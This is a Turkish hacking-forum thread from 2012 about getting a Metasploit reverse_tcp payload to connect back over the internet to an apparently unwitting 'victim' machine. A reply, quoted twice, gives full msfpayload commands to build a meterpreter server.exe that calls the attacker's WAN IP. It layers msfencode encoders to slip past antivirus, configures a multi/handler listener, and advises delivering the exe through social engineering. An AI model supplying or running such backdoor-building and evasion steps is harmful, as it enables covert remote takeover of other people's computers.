Metasploit Kullananlar ?
-
Merhaba murdiler
Metasploit in reverse_tcp payloadını lan agda degilde wan da kullanmaya calısıyorum yani
Giresundan istanbuldaki bilgisayara mudahale etmeye calısıyorum
Suanlık deneme yapıyorum
modemin 5000 portuna gelen istekleri lan daki ipme yonlendirdim
payload a modem in ip adresini yazıp exe olarak olusturduktan sonra kurban yolluyorum.handler e ise landanki ip adresimi ve 5000 portu yazıyorum
ve dinlemede bekliyorum.
olması gereken su kurban exe actıktan sonra modem in 5000 portuna istek yollucak bu istegide modem bana yonledircek ve ben zaten lan ip e gelen istekleri dinledimden baglantıyı kurucam
Ancak bu olmuyor nedeni nedir acaba ?
-
modemin dmz = (nete direk cıkıs yapmanı saglar butun portların acılır ) özelligi varsa onu aç bide metaspolitte kullanılan payloadların cogu anti virusler tarafından algılanıyor kendi payloadını yazmak zorundasın exploitlerde oyle karsı tarafta av varsa metaspolit etkisiz kalır
-
ustura bunu yazdı:
-----------------------------modemin dmz = (nete direk cıkıs yapmanı saglar butun portların acılır ) özelligi varsa onu aç bide metaspolitte kullanılan payloadların cogu anti virusler tarafından algılanıyor kendi payloadını yazmak zorundasın exploitlerde oyle karsı tarafta av varsa metaspolit etkisiz kalır
-----------------------------hocam zaten kendi ustumde sanal makinede deniyorum baglantıyı bir kursaydık anti virus kısmına gecerdim diyodum modem in dmz buldum denicem
hani sen bu dedimi yapmısmıydın ?
-
UPNP çözermi yapmak istediğini
tam anlamadım
-
HolyOne bunu yazdı:
-----------------------------UPNP çözermi yapmak istediğini
tam anlamadım
-----------------------------Hocam burda anlatmak istediklerim tamammen acıklıyor :)
http://www.youtube.com/watch?v=Dq5Q9P5Hd9c
-
Dmz ile.2 defa ugrastim modem kafayi yiyo.net gelmiyo fabrika ayarlarina cevirsemde
-
adamda caktı davayı heralde wireles sifresini degistirdi elimizdeki internettende olduk :(
-
Sunu cozume ulastıracak bir baba yigit varmı ?
-
Yardımcı olacaklara wireshrak cıktısınıda yollayabilirim
-
Anlamadığım nokta; hem wan da istanbuldaki bir makineyi hacklemeye çalışıyorum diyorsun hem de sanal makinada deniyorum diyorsun. neyse, istanbuldaki bir makinayı hacklemeye çalıştığını var sayıyorum.
normalde
cd /pentest/exploits/framework
msfpayload windows/meterpreter/reverse_tcp LHOST=senin-wan-ip-adresin LPORT=1234 x > /root/server.exe
komutuyla root dizininde server.exe yi oluşturursun. Karşı tarafta av olduğunu varsayarak .exe ni raw olarak birkaç şekilde encode edersin ama yine de bazı av ler yakalayabilir, farklı kombinasyonlar denemelisin.
örnek:
msfpayload windows/meterpreter/reverse_tcp LHOST=senin-wan-ip-adresin LPORT=1234 R |
msfencode -e x86/shikata_ga_nai -c 3 -t raw |
msfencode -e x86/fnstenv_mov -c 5 -t raw |
msfencode -e x86/call4_dword_xor -c 4 -t raw |
msfencode -e x86/countdown -c 4 -t raw |
msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/server.exe
server.exe yi bir kaç av den kaçırdık.
şimdi handler ile dinlemeye alalım:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.x(lan ip adresin)
set LPORT 1234
exploit
bu aşamadan sonra farklı sosyal mühendislik yöntemleriyle server.exe yi kurbana yedirmen lazım.
Eğer ben de yukarıdakilerin aynısını yaptım diyorsan; Önce local ip adresine yönlerdirdiğin portu handleri çalıştırdıktan sonra http://www.canyouseeme.org/ adresinden kontrol et. open diyorsa ya karşı taraf av veya firewall kullanıyordur yada server.exe yi çalıştırmıyordur.
gece gece benden bu kadar.
-
SpoofU bunu yazdı:
-----------------------------Anlamadığım nokta; hem wan da istanbuldaki bir makineyi hacklemeye çalışıyorum diyorsun hem de sanal makinada deniyorum diyorsun. neyse, istanbuldaki bir makinayı hacklemeye çalıştığını var sayıyorum.
normalde
cd /pentest/exploits/framework
msfpayload windows/meterpreter/reverse_tcp LHOST=senin-wan-ip-adresin LPORT=1234 x > /root/server.exe
komutuyla root dizininde server.exe yi oluşturursun. Karşı tarafta av olduğunu varsayarak .exe ni raw olarak birkaç şekilde encode edersin ama yine de bazı av ler yakalayabilir, farklı kombinasyonlar denemelisin.
örnek:
msfpayload windows/meterpreter/reverse_tcp LHOST=senin-wan-ip-adresin LPORT=1234 R |
msfencode -e x86/shikata_ga_nai -c 3 -t raw |
msfencode -e x86/fnstenv_mov -c 5 -t raw |
msfencode -e x86/call4_dword_xor -c 4 -t raw |
msfencode -e x86/countdown -c 4 -t raw |
msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/server.exe
server.exe yi bir kaç av den kaçırdık.
şimdi handler ile dinlemeye alalım:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.x(lan ip adresin)
set LPORT 1234
exploit
bu aşamadan sonra farklı sosyal mühendislik yöntemleriyle server.exe yi kurbana yedirmen lazım.
Eğer ben de yukarıdakilerin aynısını yaptım diyorsan; Önce local ip adresine yönlerdirdiğin portu handleri çalıştırdıktan sonra http://www.canyouseeme.org/ adresinden kontrol et. open diyorsa ya karşı taraf av veya firewall kullanıyordur yada server.exe yi çalıştırmıyordur.
gece gece benden bu kadar.
-----------------------------Hocam sagolasın
İstanbul derken anlasılması icin dedim sanal olarak deniyorum ve antivirus ve firewallyok(sadece local ip lerle denedimde baglantı saglıyorum)
dediklerinin hepsini yaptım .modemi ip me ve port uma yonlendirdim.Sabit ip aldım modemden.
server exe icin modem ip ni
handler icinse local ip alıp bekledim ancak server calıstırdımda baglantı olmadı.
Mantıken olması lazım ancak neden olmuyo kafayı yicem artık.
Success: I can see your service on
78.169.28.* on port ( 4444)
Your ISP is not blocking port 4444Bu cevap verdi ve handlere baktımda sending stage ... diye gozuktu.ancak
Ben server calıstırdımda hic bir baglantı donmedi
Acaba ben bunu local de denedim icin modem yonlendirmiyo olabilirmi ?
Mesaj 26 Temmuz 2012 (Persembe) Saat: 01:23'da Mx0TBT tarafından düzenlendi.